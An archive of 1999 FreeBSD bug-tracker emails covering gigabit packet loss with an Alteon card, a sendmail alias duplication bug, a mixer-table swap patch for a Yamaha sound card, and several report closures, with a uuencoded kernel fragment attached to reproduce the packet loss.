From owner-freebsd-bugs Sun Oct 31 11: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 358C914D85 for ; Sun, 31 Oct 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA75196; Sun, 31 Oct 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from prism.flugsvamp.com (prism.flugsvamp.com [208.139.222.230]) by hub.freebsd.org (Postfix) with ESMTP id 2B0DE14C0E for ; Sun, 31 Oct 1999 10:58:46 -0800 (PST) (envelope-from jlemon@prism.flugsvamp.com) Received: (from jlemon@localhost) by prism.flugsvamp.com (8.9.3/8.9.3) id MAA11750; Sun, 31 Oct 1999 12:58:33 -0600 (CST) (envelope-from jlemon) Message-Id: <199910311858.MAA11750@prism.flugsvamp.com> Date: Sun, 31 Oct 1999 12:58:33 -0600 (CST) From: Jonathan Lemon Reply-To: jlemon@flugsvamp.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14623: packet loss on gigabit network Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14623 >Category: kern >Synopsis: packet loss on gigabit network >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 31 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jonathan Lemon >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: PC#1 (client) is a 450Mhz-PIII with a fxp0 card. (Dell 410) PC#2 (server) is a 600Mhz-PIII with an Alteon card. (Dell 4300) Machines are connected via a Netgear FS509 switch, with the alteon card being plugged into the gigabit port. PC#2 (server) also has an fxp0 card which can be used in lieu of the ti0 card. All connections to the switch are full-duplex. Both machines are running 4.0-CURRENT as of 28-oct-99. Alteon card/driver details: $FreeBSD: src/sys/pci/if_ti.c,v 1.24 1999/09/23 03:32:54 wpaul ti0@pci0:12:0: class=0x020000 card=0x000112ae chip=0x000112ae rev=0x01 hdr=0x00 >Description: Performing bulk data transfer between client and server results in packets disappearing. Further retransmits of the lost packet still do not result in the other end receiving the packet. More specifically, tcpdumps taken on both machines show the following pattern: (note: no packets were dropped by bpf during these traces) Client transmits on the order of 100 packets in at full blast to server, which acks the packets correctly. Server does not receive a packet that the client transmits (never shows up on tcpdump on the server side) Client retransmits missing packet using exponential backoff (1, 2, 4, 8, 16, etc). tcpdump on the client shows the packet being sent. tcpdump on the server shows no packets being received. No further progress is made on the connection. This is symmetric; it doesn't matter whether the sender is the server or the client; it happens both ways. 1. this only happens after a large number of packets are sent. (roughly between 145K to 310K bytes) 2. this does not happen when using two fxp0 cards. 3. other TCP sessions between the machines (e.g.: telnet) are unaffected. tcpdump traces, full dmesg output, or other information also available. >How-To-Repeat: ftp a large file (/kernel) from one machine to another in the given environment. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 12:30: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 22CE014E5E for ; Sun, 31 Oct 1999 12:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81079; Sun, 31 Oct 1999 12:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 6567114CAC for ; Sun, 31 Oct 1999 12:20:25 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id KAA23018; Sun, 31 Oct 1999 10:20:45 -1000 (HST) (envelope-from vince) Message-Id: <199910312020.KAA23018@pele.WURLDLINK.NET> Date: Sun, 31 Oct 1999 10:20:45 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14626: sendmail 8.9.3 bug with aliases in -CURRENT Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14626 >Category: bin >Synopsis: sendmail 8.9.3 bug with aliases in -CURRENT >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 31 12:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: Standard October 30, 1999 7:30AM PDT -700 -CURRENT build. >Description: I'm using the standard freebsd.mc for my sendmail.cf. It appears that with majordomo mailing lists, majordomo outputs correctly to sendmail but sendmail will send multiple copies of the same mail to each address depending on the size of each list. I have tried sending directly to hks-outgoing@earth.gaianet.net with the same results since this should bypass majordomo altogether. hks-outgoing::include:/usr/local/majordomo/lists/hks mailq shows only one address for that queue but each user gets the message from 2-6 times. >How-To-Repeat: It seems that the file includied in aliases needs to have more than a certain amount of addresses to show the problem. >Fix: Unknown at this time. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 15:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BC21F14EE0 for ; Sun, 31 Oct 1999 15:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA90099; Sun, 31 Oct 1999 15:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BA50114CC5; Sun, 31 Oct 1999 15:12:51 -0800 (PST) Message-Id: <19991031231251.BA50114CC5@hub.freebsd.org> Date: Sun, 31 Oct 1999 15:12:51 -0800 (PST) From: kushn@mail.kar.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14634: Mixer synth & mixer CD seem to be swapped for Yamaha OPL SAx under newpcm Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14634 >Category: kern >Synopsis: Mixer synth & mixer CD seem to be swapped for Yamaha OPL SAx under newpcm >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 31 15:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vladimir Kushnir >Release: FreeBSD-current >Organization: >Environment: FreeBSD kushnir.kiev.ua 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Sun Oct 31 14:11:20 EET 1999 root@kushnir.kiev.ua:/usr/src/sys/compile/KUSHNIR i386 >Description: Mixr tables for synth & CD under newpcm are swapped (at least, for Yamaha OPL SA2) so that mixer synth (not implemented as yet device) actually controls volume for CD-DA >How-To-Repeat: mixer synth 0:0 Mixer synth is currently set to 0:0 Result: no sound out of the CD. At the same time, setting `mixer synth enables sound for CD plyers (cdcomtrol, ascd and so on) >Fix: Don't know if this is a common feature for all the MSS-compatibles, but with my Yamaha OPL SA2 card works swapping of tables: *************** *** 172,183 **** MIX_NONE(SOUND_MIXER_VOLUME), MIX_NONE(SOUND_MIXER_BASS), MIX_NONE(SOUND_MIXER_TREBLE), ! MIX_ENT(SOUND_MIXER_SYNTH, 2, 1, 0, 5, 3, 1, 0, 5), MIX_ENT(SOUND_MIXER_PCM, 6, 1, 0, 6, 7, 1, 0, 6), MIX_ENT(SOUND_MIXER_SPEAKER, 26, 1, 0, 4, 0, 0, 0, 0), MIX_ENT(SOUND_MIXER_LINE, 18, 1, 0, 5, 19, 1, 0, 5), MIX_ENT(SOUND_MIXER_MIC, 0, 0, 5, 1, 1, 0, 5, 1), ! MIX_ENT(SOUND_MIXER_CD, 4, 1, 0, 5, 5, 1, 0, 5), MIX_ENT(SOUND_MIXER_IMIX, 13, 1, 2, 6, 0, 0, 0, 0), MIX_NONE(SOUND_MIXER_ALTPCM), MIX_NONE(SOUND_MIXER_RECLEV), --- 172,183 ---- MIX_NONE(SOUND_MIXER_VOLUME), MIX_NONE(SOUND_MIXER_BASS), MIX_NONE(SOUND_MIXER_TREBLE), ! MIX_ENT(SOUND_MIXER_SYNTH, 4, 1, 0, 5, 5, 1, 0, 5), MIX_ENT(SOUND_MIXER_PCM, 6, 1, 0, 6, 7, 1, 0, 6), MIX_ENT(SOUND_MIXER_SPEAKER, 26, 1, 0, 4, 0, 0, 0, 0), MIX_ENT(SOUND_MIXER_LINE, 18, 1, 0, 5, 19, 1, 0, 5), MIX_ENT(SOUND_MIXER_MIC, 0, 0, 5, 1, 1, 0, 5, 1), ! MIX_ENT(SOUND_MIXER_CD, 2, 1, 0, 5, 3, 1, 0, 5), MIX_ENT(SOUND_MIXER_IMIX, 13, 1, 2, 6, 0, 0, 0, 0), MIX_NONE(SOUND_MIXER_ALTPCM), MIX_NONE(SOUND_MIXER_RECLEV), >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 20:32:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A1BC61556F; Sun, 31 Oct 1999 20:32:46 -0800 (PST) (envelope-from julian@FreeBSD.org) Received: (from julian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA23751; Sun, 31 Oct 1999 20:32:46 -0800 (PST) (envelope-from julian@FreeBSD.org) Date: Sun, 31 Oct 1999 20:32:46 -0800 (PST) From: Message-Id: <199911010432.UAA23751@freefall.freebsd.org> To: tobez@plab.ku.dk, julian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/10805: h2ph incorrectly deals with #error and #warning (FIX included) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: h2ph incorrectly deals with #error and #warning (FIX included) State-Changed-From-To: open->closed State-Changed-By: julian State-Changed-When: Sun Oct 31 20:32:10 PST 1999 State-Changed-Why: bug fixed in new version of perl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 20:48:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B792414CAA; Sun, 31 Oct 1999 20:48:27 -0800 (PST) (envelope-from julian@FreeBSD.org) Received: (from julian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA25279; Sun, 31 Oct 1999 20:48:27 -0800 (PST) (envelope-from julian@FreeBSD.org) Date: Sun, 31 Oct 1999 20:48:27 -0800 (PST) From: Message-Id: <199911010448.UAA25279@freefall.freebsd.org> To: tobez@plab.ku.dk, julian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/8164: [patch] repquota incorrectly reports quotas larger than 4Gbytes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [patch] repquota incorrectly reports quotas larger than 4Gbytes State-Changed-From-To: open->closed State-Changed-By: julian State-Changed-When: Sun Oct 31 20:47:43 PST 1999 State-Changed-Why: applied patch (to -current) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 20:59:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4993714BE4; Sun, 31 Oct 1999 20:59:12 -0800 (PST) (envelope-from julian@FreeBSD.org) Received: (from julian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA26185; Sun, 31 Oct 1999 20:59:12 -0800 (PST) (envelope-from julian@FreeBSD.org) Date: Sun, 31 Oct 1999 20:59:12 -0800 (PST) From: Message-Id: <199911010459.UAA26185@freefall.freebsd.org> To: ezk@cs.columbia.edu, julian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/9764: allow /bin/df not to list certain entries (made by automounter) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: allow /bin/df not to list certain entries (made by automounter) State-Changed-From-To: open->closed State-Changed-By: julian State-Changed-When: Sun Oct 31 20:57:57 PST 1999 State-Changed-Why: patches applied. code to set these bits hopefully follow soon. . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 21:38:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from prism.flugsvamp.com (prism.flugsvamp.com [208.139.222.230]) by hub.freebsd.org (Postfix) with ESMTP id 4D7AC14BC4 for ; Sun, 31 Oct 1999 21:38:38 -0800 (PST) (envelope-from jlemon@prism.flugsvamp.com) Received: (from jlemon@localhost) by prism.flugsvamp.com (8.9.3/8.9.3) id XAA12345 for bugs@freebsd.org; Sun, 31 Oct 1999 23:38:22 -0600 (CST) (envelope-from jlemon) Date: Sun, 31 Oct 1999 23:38:22 -0600 From: Jonathan Lemon To: bugs@freebsd.org Subject: kern/14623: packet loss on gigabit network Message-ID: <19991031233822.A12282@prism.flugsvamp.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Upon further investigation, this appears to be a bit-pattern problem. Attached is a file which refuses to transfer via a "ftp get". (The smallest part of a /kernel file that I can figure out which will reproduce the problem). Are there any known issues with either the Netgear switch or Alteon card? -- Jonathan begin 644 badfile M'?2$)<"-!)T`````BT00!/]U%/]U$/]U#%'_T(M=_,G#D)"058GE5U93BW4( MBUT,BTT0BWT4A)UH7)?ZG&!@"-9?1;7E_)PXGV58GE4XM="(M5#(M-$(`Z`'0^B?:% MR7X\@#HJ=0575E.+70R+=1"+?1B%]GX= MD%.+50A2_]>#Q`B%P'4&B=CK#(GV3@-=%(7V?^0QP(UE]%M>7\G#D)!5B>5H MH(@EP.@SF@(`R<.058GER<.-=@!5B>6+10R#P"A0Z!U3`P#)PXUV`%6)Y5.+ M70S_=0CH`9P"`(G"#[;2B=B#X`.#Q`2#^`-T![@!````ZSCVPP1T$U)H(!@C MP.ALSP,`N!,```#K(9"%TG4,@`VL8RG``3'`ZQ&04FA@&"/`Z$G/`P"X!@`` M`(M=_,G#C78`58GE_W4(Z)V;`@`E_P```(/$!(7`=0V`):QC*<#^,<#K$HGV M4&B@&"/`Z`W/`P"X!@```,G#B?95B>6![,P!``!75E.+=0R+71#'A5#^__\` M````_W4(Z$R;`@`E_P```(/$!(7`=!A0:.`8(\#HR%B/[__WRG$% M0/[__P````"`>V``=1''A5#^__\6````Z1P"``")]NA+LA``B84\_O__BSVP M8RG`NP!C*<"#/0!C*<``=":0BY5(_O__4HL#_W`$Z%-G$0"#Q`B%P'0(@\,$ M@SL`=>"#.P!U.XN-//[__U'HO[$0`(N53/[__\=",`0```#'0GP#````QD)@ M`,="<`````#'A5#^__\"````Z9L!``"0BP.+6`B%VP^$+`$``(UV`(N-1/[_ M_SE+)'0U3G4KBY4\_O__4NAFL1``Z*&Q$`")A3S^__^^9````(/$!#L]L&,I MP`^%0O___XM;0(7;=<"%VP^$X0```,>%0/[__P$```"+0QR+0`R)A3C^___' MA33^__\`````BUATA=L/A+8```"0BT,8B<:_`QDCP+D%````_*@`\Z8/A88` M``!0BX5,_O__@\!@4.B"9A$`BT,DBXU,_O__B4%P@\0(@WL\`'0)QT%\`@`` M`.L-BY5,_O__QT)\`````(N-./[__XM!>(N53/[__XE"=(N--/[__XE*>(M# M'(M`!(M`$(E".(M#'(M`"(M`%(E"/(M#'(M`#(M`+(E"0,=",`$```#K%(UV M`(M;//^%-/[__X7;#X5/____A=MU28N53/[__\=",`0```#'0GP#````QD)@ M`,="<`````#'A5#^__\"````@[U`_O__`747:"`9(\#HN\H#`&A@&2/`Z+'* M`P"#Q`B+C3S^__]1Z`*P$`#K"L>%4/[__QD```"+A5#^__^-I2C^__];7E_) MPY!5B>6#[`13QP788RG``````,<%W&,IP-AC*<#'!;1C*<``````QP6X8RG` MM&,IP,<%O&,IP`````#'!6+10B%P'06QT`@`````*/08RG`N`$```#K M$HUV`&B`&B/`Z+;(`P"X!````,G#C78`58GE@^P$5U93BW4(BT86#[`175E.+=0B+1AR+6`R% MVW10C7MTZ"JN$`")1?R+0S1(4(U#,%#H<4P``/]#>(/$"#ES='4*BT8\B4-T MZQN)]HL7.7(\=`F0BU(\.7(\=?B+0CR+0#R)0CR+3?Q1Z$JM$`#_!;!C*<"- M9?!;7E_)PU6)Y8'L0`$``%=64XM%"(MP'.B]K1``B87$_O__BT8,_W`LBT8( M_W`4BT8$BT`4_W`8BT8$BT`4_W`4BT8$BT`4_W`(BT4(_W`D_W`8:*`:(\#H MA<<#`(/$((M%"/]P)/]P&&C&&B/`Z&_'`P"+1@P%A````%#H$6X``(/$$(,] M9`DIP`!T*(M6#("ZL`````!T'/^RK````(M%"/]P)/]P&&C-&B/`Z##'`P"# MQ!!J`5:-78Q3Z+DA``#'1;@5````QT7P`0```%/H'1(``(/$$(-]O`$/A90! M``#V1>P"=!J#??@`=!3_=?3H"&\``(G'B?N#Q`3K*HUV`&H!5HV=R/[__U/H M:2$``,>%]/[__P0```!3Z-$1``"+78@Q_X/$$/9%[`1T!8M-_-/CN---8A#W MX\'J!G0JB=#!X`4IT(T$@L'@`RG#4U*+10C_<"3_`%*="-!(+!X`.)VBG"B=#!X`4IT(T$@L'@`U"+ M10C_<"3_`%*="-!(+!X`,IQU=2:!L;(\#H!<8#`(/$$/9%[`1T1(-]_`!T/O9% M[`)T$(-]^`!T"F@S&R/`ZPB-=@!H-ALCP.C6Q0,`@\0$N`@```"+3?S3X%!H M.1LCP.B^Q0,`@\0(ZQJ0]D7L`G03@WWX`'0-:$`;(\#HHL4#`(/$!(M6#/:" MJ`````)U"?:"N````"!T#6A"&R/`Z(#%`P"#Q`1H7!LCP.ASQ0,`@\0$ZRV) M]HM6#/:"J`````)U"?:"N````"!T%HM%"/]P)/]P&&A@&R/`Z$3%`P"#Q`R# M?0P`=!J+10Q0BT4(_W`D_W`8:'\;(\#H),4#`(/$$(N%Q/[__U#H=:H0`(VE MM/[__UM>7\G#B?95B>575E,QVX-]$`!U"K@P````Z>P```"#?0@`=`:#?0P` M=0RX(0```.G6````B?8Q]CMU#`^-OP```)"-!/4`````*?"+?0B#/,<"=!+V MP_`/A9D```"#RR#ID0```)"-!/4`````*?"+?0B-3,<$@WD<#W4,@\L!]L/P M#X6`````@WD<`'1H]D$<`70*BP&+?1`[1Q!U6/9!'`AT#HM]$(M7%(M!&#M" M&'5$]D$7\G#58GE5U93,=N#?1``=0JX,````.GZ````@WT(`'4*N"$```#I MZ@```#'V.W4,#XW5````D(T$]0`````I\,'@`XM]"(,\!P%T&X,\!P`/A:L` M``#VP_`/A:(```"#RR#IF@```(T$]0`````I\(M]"(U,QP2#>3`/=0R#RP'V MP_`/A8H```"#>3``='+V03`!=!"+?1"+1RB+4!"+`3M"$'5<]D$P`G0.BWT0 MBU7\G#B?95B>6#[`175E.+?1"%_W4,N#````#I MY@```(GV@WT(`'0&@WT,`'48N!$```#IS@```(GV@$W\`>G`````C78`QT7\ M$````#';.UT,#XVK````B?:-!-T`````*=C!X`.+=0B#/`8`#X6&````C4PP M!(-Y(!]TO8-Y(`!T=O9!(`%T#HM''(M0!(M!%#M"$'5B]D$@`G04BT<<@W@( M`'13BU`(BT$8.T(4=4CV02`$=!2+1QR#>`P`=#F+4`R+01P[0BQU+O9!(!!T M"(M!$#M')'4@]D$@"`^$5____VH0_W<84>@\71$`@\0,A<`/A$'___]#.UT, M#XQ7____BT7\C67P6UY?R<-5B>6#[`175E.+?0B+70SV@XP````!="0YNY`` M``!U'/:#C`````)T$X.[E`````!T"L=%_"````#K$Y!7_W-D_W-LZ(C\__^) M1?R#Q`R+1?PE\````(/X,'41QT-@!````#'`Z50!``"-=@"+=?SWQ@$````/ MA*@```"+(M7%(M2&(E4 M`1R+2WB+5Q2+4A2)5`$8:A"+5Q3_<@@#0WB#P`A0Z#A<$0"#Q`R+1?PE\``` M`(/X$'4,N`$```#I@P```(GV]H.,`````71G.[N0````=2OV@XP````"="*# MNX``````=!F+@X`````[1RAT#L=#8`(````QP.M(C78`]H.,`````70K.;N0 M````=2/V@XP````"=!J#NY0`````=!&+=0Q6:"2W$<#_LY0```#K"XMU#%9H M)+<1P&H`5^CS!P``C67P6UY?R<.-=@!5B>53BUT(BTT,B@<``(M=_,G#D%6)Y8/L"%=64XM=#/:# MC`````1T)XM-"#F+F````'4<]H.,````"'03@[N<`````'0*QT7\(````.L6 MD(M]"%?_(T$S0`````IR(TTQ0````#'!#(! M````BU-XBWT(BT(M'*(M`%(E$,@B+4WB+1RR)1#(, M:B2)\`-#>(/`$%")^`6$````4.@_$!``@\0,]H>X`````70/BT-XQT0P-`$` M``#K&8GVBU-XBTWXC03-`````"G(QT3"-`````"+1?PE\````(/X$'4,N`$` M``#IX@```(GV]H.,`````0^$OP```(M]"(M7*(M"$#N#D````'5*]H.,```` M`G1!.Y.4````=3GV@XP````$=#`[NY@```!U*/:#C`````AT'X.[B`````!T M%HN#B````#M'>'0+QT-@`@```#'`ZWCV@XP````!=%N+30B+42B+@Y`````[ M0A!U2O:#C`````)T08N#E````#G0=3?V@XP````$="XYBY@```!U)O:#C``` M``AT'8.[G`````!T%(M]#%=H=+H1P/^SG````%'K$8GVBTT,46ATNA'`:@"+ M?0A7Z#`%``"-9>Q;7E_)PU6)Y5=64XMU"(M=#%;_`#BWMT*<>)^(/X-P^'A````&HHC4-\4*'`#2G`_]#'@XP````/`0`` MBT8!C*<")0WR+1AR+0`B)@Y0```"+1AR+0`2+0"B)@X`` M``"+1AR+0`R)@Y@```"+1AR+0`B+0!R)@X0```")LYP```"+1AR+0`R+0'B) M@X@```#'0V`!````,<#K;XUV`(M#(T4Q0`````IPL'B`\<$$0`` M``"+2WB+1AR+0`2+0!")1!$8BTMXBT8(M&'(M`#(M` M+(E$$2"+2WB+1B2)1!$4:A#_=A@#4WB#P@12Z/56$0"X`0```(UE]%M>7\G# M58GE4XM=",=#<`````#V@XP````!=#V#>WP`=!>+0WP[!>!C*564XMU"(M-#(G+]H&,```` M$'1F.;&@````=2KV@8P````(="&#N8@`````=!B+%HN!B````#M"$'0+QT%@ M`@```#'`ZT+V@XP````0="LYLZ````!U(_:#C`````AT&H.[G`````!T$5%H MU+P1P/^SG````.L+C78`46C4O!'`:@!6Z%H#``"-9?A;7LG#C78`58GE@^P$ M5U93BWT(BW4,5_]V9/]V;.AE]___B<(E\````(/$#(/X,'1R]L(!#X1@`0`` MBTYPC03-`````"G(P>`#BTYT*<&)R(/X-P^'@@```&HHC49\4*'`#2G`_]#' MAHP````8`@``NP!C*<"#Q`B#/0!C*<``=!Z)]O]W&(L#_W`$Z*M4$0"#Q`B% MP'0(@\,$@SL`=>2%VW40QT9@!````#'`Z>X```")]HF>H````(F^G````(L# MBT`0B8:(````QT9@`0```#'`Z<<```"-=@"+7G#_1G"+5GB-!-T`````*=C! MX`.)1?S'!`(`````BU9XBT<(M2 M"(M2%(E4"!SK%HGVBU9XC03=`````"G8QT3"'/____^+5QR#>@P`=!N+3GB- M!-T`````*=B+4@R+4BR)5,$@ZQ>-=@"+5GB-!-T`````*=C'1,(@_____XM& M>(T4W0`````IVL'B`XM/)(E,$!1J$/]W&`-6>(/"!%+H3501`+@!````C67P M6UY?R<-5B>53BUT(QT-P`````/:#C````!!T&8.[H`````!T$%-H0+P1P/^S MH````.L*B?93:$"\$#Q`B%P'4& M,<#K"(GVB=J%TG7FC67T6UY?R<.)]E6)Y5=64XM]$(MU%+H!````BT4,A)PH/$"(72=00QP.L(B=B%P'7FB="-9?1; M7E_)PU6)Y5=64XM]$(MU%+H!````BT4,A)PH/$"(72=00QP.L(B=B% MP'7FB="-9?1;7E_)PU6)Y5=64XM]#(MU$+@!````BUT(A=MU&[L`8RG`ZQ20 M5E/_UX/$"(7`=04QP.L)D(/#!(,[`'7HC67T6UY?R<-5B>575E.+?1"+=12Z M`0```(M%#(7`=0R+10B+`(M`"(7`=!J+6$!64/_7B<*#Q`B%TG4$,<#K"(G8 MA6+30B+50R#.@!T$E)HF,`1P&H`4>B$_O__ZPN) M]HM"!/]R"%'_T,G#D%6)Y8M-"(M5#(,Z`7024FC$P!'`:@!1Z*#^___K"XGV MBT($_W((4?_0R<.058GEBTT(BU4,@SH"=!)2:/#`$6+10R+4`3_<`C_=0C_TLG#D%6)Y8/L#(M%"(M5#,=% M]`````")1?B)5?R-1?10:&S`$6![+`!``!75E.+10B+ M?0SV@+@````!=5'_<"R+0"C_%?/[__P(```"#Q"!3Z)$```!35FB`````_W<,BT<(_]!6Z,`1 M``"X`0```(VE1/[__UM>7\G#58GE@>S4````5U93BT4(BWT,:O]J_XM`%/]P M$&H`C77P5NB1$```:@%6C9TL____4^B^#P``QX58____!````(/$(%/H(P`` M`%-6:B#_=PR+1PC_T%;H51$``+@!````C:4@____6UY?R<.058GE@>R,```` M5U93BT4(QT`P`````.C-FA``B47\BU4(BUHL@_L7#X1/`@``#X>)````@_L' M#X3D"0``=S:#^P,/A#D%``!W%X7;#X2K"0``@_L"#X1N`P``Z<$)``"0@_L% M#X3_!P``#X?9!@``Z1`#``"#^Q`/A"\"``!W*8/["P^$'`,``'<.@_L*#X1= M"0``Z8@)``"#^PP/A!,$``#I>@D``(GV@_L5#X2S`@``#X>I`0``Z60)``"! M^R`$```/A%@)``!W6H'[,@,```^$C@(``'<8@_LP#X2#`@``@_LU#X1Z`@`` MZ3$)``"0@?L)!```#X14!0``=Q*!^S0#```/A%H"``#I$0D``)"!^Q$$```/ MA$@"``#I_P@``(UV`('[$@D```^$-`(``'4`'=Q+V040!=0R*04#`X`4(@9T```"+50C&@I0`````BTT( MQH&5`````,>!F`````````"+10B+<#3H`9D0`(G'BU8,@\)$_TH@BTT(45+H ML#<``(/$"(M&#(F%>/___X.XM`````!U*XM>!(-X7`!^(HM01(M*!/\Q@\`8 M4(M;%(M#+(/`%%#HIPD``(G#@\0,ZP(QVU?H#)@0`(/$!(7;#X3;!P``_W8$ MZ-T*``"#Q`3IRP<``)!J`(M5"(M2-/]R#(M-"%'H9"L``(/$#.FN!P``BT4( M@WA@`'0*@WAD``^%U0```(M5"&;'0F@``,9":@#&0FL`QT(P`0```.E^!P`` MBU4(BUI@BTLL@>$`"0``@?D`"0``#X6!````@WL(`'Q+BT,TBU`,@\)$_W,( M4NC]-@``@\0(QT,P0@```&H!_W,TZ+45``#HF)<0`(G&4^C(%P``5NA*EQ`` MBTT(QT$P`0```(/$$.D2!P``@WL(_W4J]D,Q`G4DQT,P0@```&H!_W,TZ',5 M``"+10C'0#`!````@\0(Z>,&``"0]D,M`706@WL(_740BU4(QT(P`P```.G' M!@``D(M-"(M)-(M!!(M0%(M-"%%2BP+_T(/$".FI!@``C78`BU4(BU(TBTH$ MBT$4BU4(4E"+"/_1@\0(Z8D&``"-=@"+10B+0#2+4`2+0AB+4AR+30B)06") M463'03`!````Z6(&``"+10B+0#2+6`SHNI80`(E%^/:#N`````%T$HM5",=" M,`@```#IN@```(UV`(M]"(/'8(VSA````/RY"0```/.EBH.$````)!^+50B( M@H$!``"+2UR)BH0!``"+0V")@H@!``"+2UB)BHP!``"+0TR)@I`!``"+2V2) MBI0!``"+@X````"+0!B)@I@!``"+DX````"+4A2+30B)D9P!``#'03`!```` MBH.P````B(&``0``@+NP`````'0H@[NL`````'0?#[:#L````%"+10@%A``` M`%#_LZP```#HE`(0`(/$#(M5^.E2`0``D(M-"(M)-(M9#.C.E1``B47T]H.X M`````702BT4(QT`P"````.F8````C78`BWT(BU(M-V(M)(#M.&'4.BT78BT`D.T8< M?`[K&Y"+5=B+4B`[5AA]#XM&&(M6'(E'?(F7@````,=',`$```"+3?11Z8@` M``")]L=%Z`````#H!)40`(E%\(M%"(M`-(M0#(E5[(G6@\9TBUT(@WMX`'07 MBTMT.TIX=`_'0WP!````BT7P4.M(B?:+-C'_A?9T+3M[>'(M- M[(M)>(E+=(M%\%#H$)00`,=#,`$```"#Q`3IVP,``)"+70CH.)00`(G'@[N, M`````'09BY.,````B578ZV^)]L=%V``!``#K2(UV`,=%V`````#'A7C___\` M````BTW8.TMDJ%VW1&BT,$]]`A1>2#?V``=3`Y'G4$ MBP/K"HLV.1YU^HL&BP")!HM'-(M`#/^(P````&A@VB7`4^B1T@(`@\0(ZUR+ M1V")0P3K5&H!:&#:)?;__X/$"(M% 